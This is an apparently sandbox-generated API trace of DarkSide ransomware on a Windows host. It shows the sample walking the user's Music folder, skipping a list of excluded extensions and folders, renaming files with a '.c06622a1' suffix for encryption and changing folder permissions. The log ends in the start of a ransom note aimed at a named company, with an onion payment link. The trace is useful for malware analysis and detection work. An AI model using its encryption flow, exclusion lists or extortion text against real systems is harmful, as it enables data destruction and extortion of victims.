_wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0159.825] wcslen (_String="key") returned 0x3 [0159.825] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0159.825] wcslen (_String="hta") returned 0x3 [0159.826] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0159.826] wcslen (_String="msi") returned 0x3 [0159.826] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0159.826] wcslen (_String="pdb") returned 0x3 [0159.826] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0159.826] wcslen (_String="sqlite") returned 0x6 [0159.826] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0159.826] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0159.826] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0159.826] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned 0x27 [0159.826] wcscpy (in: _Dest=0x3210098, _Source="TXAoeYh76KLw3RlgqbnC.mp3" | out: _Dest="TXAoeYh76KLw3RlgqbnC.mp3") returned="TXAoeYh76KLw3RlgqbnC.mp3" [0159.826] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TXAoeYh76KLw3RlgqbnC.mp3", dwFileAttributes=0x80) returned 1 [0159.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TXAoeYh76KLw3RlgqbnC.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\txaoeyh76klw3rlgqbnc.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0159.826] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.826] ReadFile (in: hFile=0x1ac, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0159.827] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x89d78d94 [0159.827] RtlComputeCrc32 (PartialCrc=0x8d94, Buffer=0x32ec24, Length=0x80) returned 0xdbf3790d [0159.827] RtlComputeCrc32 (PartialCrc=0x790d, Buffer=0x32ec24, Length=0x80) returned 0x591bb77c [0159.827] RtlComputeCrc32 (PartialCrc=0xb77c, Buffer=0x32ec24, Length=0x80) returned 0xff9cd4a1 [0159.827] RtlComputeCrc32 (PartialCrc=0xd4a1, Buffer=0x32ec24, Length=0x80) returned 0x7bf48bc7 [0159.827] CloseHandle (hObject=0x1ac) returned 1 [0159.827] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0159.827] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TXAoeYh76KLw3RlgqbnC.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TXAoeYh76KLw3RlgqbnC.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TXAoeYh76KLw3RlgqbnC.mp3" [0159.827] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TXAoeYh76KLw3RlgqbnC.mp3") returned 0x40 [0159.827] wcscpy (in: _Dest=0x32200d0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.828] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TXAoeYh76KLw3RlgqbnC.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\txaoeyh76klw3rlgqbnc.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TXAoeYh76KLw3RlgqbnC.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\txaoeyh76klw3rlgqbnc.mp3.c06622a1"), dwFlags=0x8) returned 1 [0159.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TXAoeYh76KLw3RlgqbnC.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\txaoeyh76klw3rlgqbnc.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ac [0159.830] CreateIoCompletionPort (FileHandle=0x1ac, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0159.830] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3510020 [0159.837] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x37365c61 [0159.837] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x728f9485 [0159.837] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x323ba392 [0159.837] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x735d05e6 [0159.837] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x418a972d [0159.837] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5e3e5482 [0159.837] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x60ae87f8 [0159.837] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5ce41ad0 [0159.840] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3510094, Length=0x80) returned 0x94fa88d5 [0159.840] RtlComputeCrc32 (PartialCrc=0x88d5, Buffer=0x3510094, Length=0x80) returned 0x5c776dc9 [0159.840] RtlComputeCrc32 (PartialCrc=0x6dc9, Buffer=0x3510094, Length=0x80) returned 0x84058a9 [0159.840] RtlComputeCrc32 (PartialCrc=0x58a9, Buffer=0x3510094, Length=0x80) returned 0x81b8d200 [0159.840] RtlComputeCrc32 (PartialCrc=0xd200, Buffer=0x3510094, Length=0x80) returned 0x6fad7110 [0159.840] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0159.840] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0159.841] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0159.842] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5abb470, ftCreationTime.dwHighDateTime=0x1d5ddac, ftLastAccessTime.dwLowDateTime=0x8d389dc0, ftLastAccessTime.dwHighDateTime=0x1d5e024, ftLastWriteTime.dwLowDateTime=0x8d389dc0, ftLastWriteTime.dwHighDateTime=0x1d5e024, nFileSizeHigh=0x0, nFileSizeLow=0x7422, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpNSot6MnsxUxqCl_wvA.wav", cAlternateFileName="UPNSOT~1.WAV")) returned 1 [0159.842] _wcsicmp (_Str1="UpNSot6MnsxUxqCl_wvA.wav", _Str2="README.c06622a1.TXT") returned 3 [0159.842] wcsstr (_Str="UpNSot6MnsxUxqCl_wvA.wav", _SubStr="README") returned 0x0 [0159.842] _wcsicmp (_Str1="autorun.inf", _Str2="UpNSot6MnsxUxqCl_wvA.wav") returned -20 [0159.842] wcslen (_String="autorun.inf") returned 0xb [0159.842] _wcsicmp (_Str1="boot.ini", _Str2="UpNSot6MnsxUxqCl_wvA.wav") returned -19 [0159.842] wcslen (_String="boot.ini") returned 0x8 [0159.843] _wcsicmp (_Str1="bootfont.bin", _Str2="UpNSot6MnsxUxqCl_wvA.wav") returned -19 [0159.843] wcslen (_String="bootfont.bin") returned 0xc [0159.843] _wcsicmp (_Str1="bootsect.bak", _Str2="UpNSot6MnsxUxqCl_wvA.wav") returned -19 [0159.843] wcslen (_String="bootsect.bak") returned 0xc [0159.843] _wcsicmp (_Str1="desktop.ini", _Str2="UpNSot6MnsxUxqCl_wvA.wav") returned -17 [0159.843] wcslen (_String="desktop.ini") returned 0xb [0159.843] _wcsicmp (_Str1="iconcache.db", _Str2="UpNSot6MnsxUxqCl_wvA.wav") returned -12 [0159.843] wcslen (_String="iconcache.db") returned 0xc [0159.843] _wcsicmp (_Str1="ntldr", _Str2="UpNSot6MnsxUxqCl_wvA.wav") returned -7 [0159.843] wcslen (_String="ntldr") returned 0x5 [0159.843] _wcsicmp (_Str1="ntuser.dat", _Str2="UpNSot6MnsxUxqCl_wvA.wav") returned -7 [0159.843] wcslen (_String="ntuser.dat") returned 0xa [0159.843] _wcsicmp (_Str1="ntuser.dat.log", _Str2="UpNSot6MnsxUxqCl_wvA.wav") returned -7 [0159.843] wcslen (_String="ntuser.dat.log") returned 0xe [0159.843] _wcsicmp (_Str1="ntuser.ini", _Str2="UpNSot6MnsxUxqCl_wvA.wav") returned -7 [0159.843] wcslen (_String="ntuser.ini") returned 0xa [0159.843] _wcsicmp (_Str1="thumbs.db", _Str2="UpNSot6MnsxUxqCl_wvA.wav") returned -1 [0159.843] wcslen (_String="thumbs.db") returned 0x9 [0159.843] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0159.843] wcslen (_String="386") returned 0x3 [0159.843] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0159.843] wcslen (_String="adv") returned 0x3 [0159.843] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0159.843] wcslen (_String="ani") returned 0x3 [0159.843] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0159.843] wcslen (_String="bat") returned 0x3 [0159.843] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0159.844] wcslen (_String="bin") returned 0x3 [0159.844] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0159.844] wcslen (_String="cab") returned 0x3 [0159.844] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0159.844] wcslen (_String="cmd") returned 0x3 [0159.844] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0159.844] wcslen (_String="com") returned 0x3 [0159.844] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0159.844] wcslen (_String="cpl") returned 0x3 [0159.844] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0159.844] wcslen (_String="cur") returned 0x3 [0159.844] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0159.844] wcslen (_String="deskthemepack") returned 0xd [0159.844] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0159.844] wcslen (_String="diagcab") returned 0x7 [0159.844] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0159.844] wcslen (_String="diagcfg") returned 0x7 [0159.844] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0159.844] wcslen (_String="diagpkg") returned 0x7 [0159.844] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0159.844] wcslen (_String="dll") returned 0x3 [0159.844] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0159.844] wcslen (_String="drv") returned 0x3 [0159.844] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0159.844] wcslen (_String="exe") returned 0x3 [0159.844] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0159.844] wcslen (_String="hlp") returned 0x3 [0159.844] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0159.844] wcslen (_String="icl") returned 0x3 [0159.844] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0159.845] wcslen (_String="icns") returned 0x4 [0159.845] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0159.845] wcslen (_String="ico") returned 0x3 [0159.845] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0159.845] wcslen (_String="ics") returned 0x3 [0159.845] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0159.845] wcslen (_String="idx") returned 0x3 [0159.845] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0159.845] wcslen (_String="ldf") returned 0x3 [0159.845] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0159.845] wcslen (_String="lnk") returned 0x3 [0159.845] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0159.845] wcslen (_String="mod") returned 0x3 [0159.845] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0159.845] wcslen (_String="mpa") returned 0x3 [0159.845] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0159.845] wcslen (_String="msc") returned 0x3 [0159.845] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0159.845] wcslen (_String="msp") returned 0x3 [0159.845] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0159.845] wcslen (_String="msstyles") returned 0x8 [0159.845] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0159.845] wcslen (_String="msu") returned 0x3 [0159.845] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0159.845] wcslen (_String="nls") returned 0x3 [0159.845] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0159.845] wcslen (_String="nomedia") returned 0x7 [0159.845] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0159.845] wcslen (_String="ocx") returned 0x3 [0159.845] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0159.845] wcslen (_String="prf") returned 0x3 [0159.846] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0159.846] wcslen (_String="ps1") returned 0x3 [0159.846] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0159.846] wcslen (_String="rom") returned 0x3 [0159.846] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0159.846] wcslen (_String="rtp") returned 0x3 [0159.846] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0159.846] wcslen (_String="scr") returned 0x3 [0159.846] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0159.846] wcslen (_String="shs") returned 0x3 [0159.846] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0159.846] wcslen (_String="spl") returned 0x3 [0159.846] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0159.846] wcslen (_String="sys") returned 0x3 [0159.846] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0159.847] wcslen (_String="theme") returned 0x5 [0159.847] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0159.847] wcslen (_String="themepack") returned 0x9 [0159.847] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0159.847] wcslen (_String="wpx") returned 0x3 [0159.847] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0159.847] wcslen (_String="lock") returned 0x4 [0159.847] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0159.847] wcslen (_String="key") returned 0x3 [0159.847] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0159.847] wcslen (_String="hta") returned 0x3 [0159.847] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0159.847] wcslen (_String="msi") returned 0x3 [0159.847] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0159.847] wcslen (_String="pdb") returned 0x3 [0159.847] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0159.847] wcslen (_String="sqlite") returned 0x6 [0159.847] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0159.847] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0159.847] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0159.847] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned 0x27 [0159.848] wcscpy (in: _Dest=0x3210098, _Source="UpNSot6MnsxUxqCl_wvA.wav" | out: _Dest="UpNSot6MnsxUxqCl_wvA.wav") returned="UpNSot6MnsxUxqCl_wvA.wav" [0159.848] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UpNSot6MnsxUxqCl_wvA.wav", dwFileAttributes=0x80) returned 1 [0159.848] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UpNSot6MnsxUxqCl_wvA.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\upnsot6mnsxuxqcl_wva.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0159.848] SetFilePointerEx (in: hFile=0x1d4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.848] ReadFile (in: hFile=0x1d4, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0159.849] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xba6cfebe [0159.849] RtlComputeCrc32 (PartialCrc=0xfebe, Buffer=0x32ec24, Length=0x80) returned 0xb2305065 [0159.849] RtlComputeCrc32 (PartialCrc=0x5065, Buffer=0x32ec24, Length=0x80) returned 0x7fcd9eea [0159.849] RtlComputeCrc32 (PartialCrc=0x9eea, Buffer=0x32ec24, Length=0x80) returned 0xf3bd8ae1 [0159.849] RtlComputeCrc32 (PartialCrc=0x8ae1, Buffer=0x32ec24, Length=0x80) returned 0x61c442e4 [0159.849] CloseHandle (hObject=0x1d4) returned 1 [0159.849] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0159.849] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UpNSot6MnsxUxqCl_wvA.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UpNSot6MnsxUxqCl_wvA.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UpNSot6MnsxUxqCl_wvA.wav" [0159.849] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UpNSot6MnsxUxqCl_wvA.wav") returned 0x40 [0159.850] wcscpy (in: _Dest=0x32200d0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.850] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UpNSot6MnsxUxqCl_wvA.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\upnsot6mnsxuxqcl_wva.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UpNSot6MnsxUxqCl_wvA.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\upnsot6mnsxuxqcl_wva.wav.c06622a1"), dwFlags=0x8) returned 1 [0159.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UpNSot6MnsxUxqCl_wvA.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\upnsot6mnsxuxqcl_wva.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d4 [0159.852] CreateIoCompletionPort (FileHandle=0x1d4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0159.852] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x35a0020 [0159.859] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6a0cc491 [0159.859] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6a8a0eac [0159.859] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4cec76a8 [0159.859] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x602af8b4 [0159.859] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x123846ff [0159.859] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2d51184e [0159.859] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1ea9e5a [0159.859] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xfc650d1 [0159.863] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x35a0094, Length=0x80) returned 0x3246dbcc [0159.863] RtlComputeCrc32 (PartialCrc=0xdbcc, Buffer=0x35a0094, Length=0x80) returned 0xc8c061e2 [0159.863] RtlComputeCrc32 (PartialCrc=0x61e2, Buffer=0x35a0094, Length=0x80) returned 0x903dfa92 [0159.863] RtlComputeCrc32 (PartialCrc=0xfa92, Buffer=0x35a0094, Length=0x80) returned 0xf7f94876 [0159.863] RtlComputeCrc32 (PartialCrc=0x4876, Buffer=0x35a0094, Length=0x80) returned 0xa543a8ad [0159.863] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0159.863] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0159.864] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0159.865] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2dbab50, ftCreationTime.dwHighDateTime=0x1d5da7a, ftLastAccessTime.dwLowDateTime=0xf5ece580, ftLastAccessTime.dwHighDateTime=0x1d5e24d, ftLastWriteTime.dwLowDateTime=0xf5ece580, ftLastWriteTime.dwHighDateTime=0x1d5e24d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uulx-x", cAlternateFileName="")) returned 1 [0159.865] _wcsicmp (_Str1="$recycle.bin", _Str2="Uulx-x") returned -81 [0159.865] wcslen (_String="$recycle.bin") returned 0xc [0159.865] _wcsicmp (_Str1="config.msi", _Str2="Uulx-x") returned -18 [0159.865] wcslen (_String="config.msi") returned 0xa [0159.865] _wcsicmp (_Str1="$windows.~bt", _Str2="Uulx-x") returned -81 [0159.865] wcslen (_String="$windows.~bt") returned 0xc [0159.865] _wcsicmp (_Str1="$windows.~ws", _Str2="Uulx-x") returned -81 [0159.865] wcslen (_String="$windows.~ws") returned 0xc [0159.865] _wcsicmp (_Str1="windows", _Str2="Uulx-x") returned 2 [0159.865] wcslen (_String="windows") returned 0x7 [0159.865] _wcsicmp (_Str1="appdata", _Str2="Uulx-x") returned -20 [0159.865] wcslen (_String="appdata") returned 0x7 [0159.865] _wcsicmp (_Str1="application data", _Str2="Uulx-x") returned -20 [0159.866] wcslen (_String="application data") returned 0x10 [0159.866] _wcsicmp (_Str1="boot", _Str2="Uulx-x") returned -19 [0159.866] wcslen (_String="boot") returned 0x4 [0159.866] _wcsicmp (_Str1="google", _Str2="Uulx-x") returned -14 [0159.866] wcslen (_String="google") returned 0x6 [0159.866] _wcsicmp (_Str1="mozilla", _Str2="Uulx-x") returned -8 [0159.866] wcslen (_String="mozilla") returned 0x7 [0159.866] _wcsicmp (_Str1="program files", _Str2="Uulx-x") returned -5 [0159.866] wcslen (_String="program files") returned 0xd [0159.866] _wcsicmp (_Str1="program files (x86)", _Str2="Uulx-x") returned -5 [0159.866] wcslen (_String="program files (x86)") returned 0x13 [0159.866] _wcsicmp (_Str1="programdata", _Str2="Uulx-x") returned -5 [0159.866] wcslen (_String="programdata") returned 0xb [0159.866] _wcsicmp (_Str1="system volume information", _Str2="Uulx-x") returned -2 [0159.866] wcslen (_String="system volume information") returned 0x19 [0159.866] _wcsicmp (_Str1="tor browser", _Str2="Uulx-x") returned -1 [0159.866] wcslen (_String="tor browser") returned 0xb [0159.866] _wcsicmp (_Str1="windows.old", _Str2="Uulx-x") returned 2 [0159.866] wcslen (_String="windows.old") returned 0xb [0159.866] _wcsicmp (_Str1="intel", _Str2="Uulx-x") returned -12 [0159.866] wcslen (_String="intel") returned 0x5 [0159.866] _wcsicmp (_Str1="msocache", _Str2="Uulx-x") returned -8 [0159.866] wcslen (_String="msocache") returned 0x8 [0159.866] _wcsicmp (_Str1="perflogs", _Str2="Uulx-x") returned -5 [0159.866] wcslen (_String="perflogs") returned 0x8 [0159.866] _wcsicmp (_Str1="x64dbg", _Str2="Uulx-x") returned 3 [0159.866] wcslen (_String="x64dbg") returned 0x6 [0159.867] _wcsicmp (_Str1="public", _Str2="Uulx-x") returned -5 [0159.867] wcslen (_String="public") returned 0x6 [0159.867] _wcsicmp (_Str1="all users", _Str2="Uulx-x") returned -20 [0159.867] wcslen (_String="all users") returned 0x9 [0159.867] _wcsicmp (_Str1="default", _Str2="Uulx-x") returned -17 [0159.867] wcslen (_String="default") returned 0x7 [0159.867] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*" [0159.867] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned 0x29 [0159.867] wcscpy (in: _Dest=0x208e70, _Source="Uulx-x" | out: _Dest="Uulx-x") returned="Uulx-x" [0159.867] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0159.867] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0159.868] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" [0159.868] GetNamedSecurityInfoW () returned 0x0 [0159.868] SetEntriesInAclW () returned 0x0 [0159.868] SetNamedSecurityInfoW () returned 0x0 [0159.886] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22ba28) returned 1 [0159.886] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0159.886] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x")) returned 1 [0159.886] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 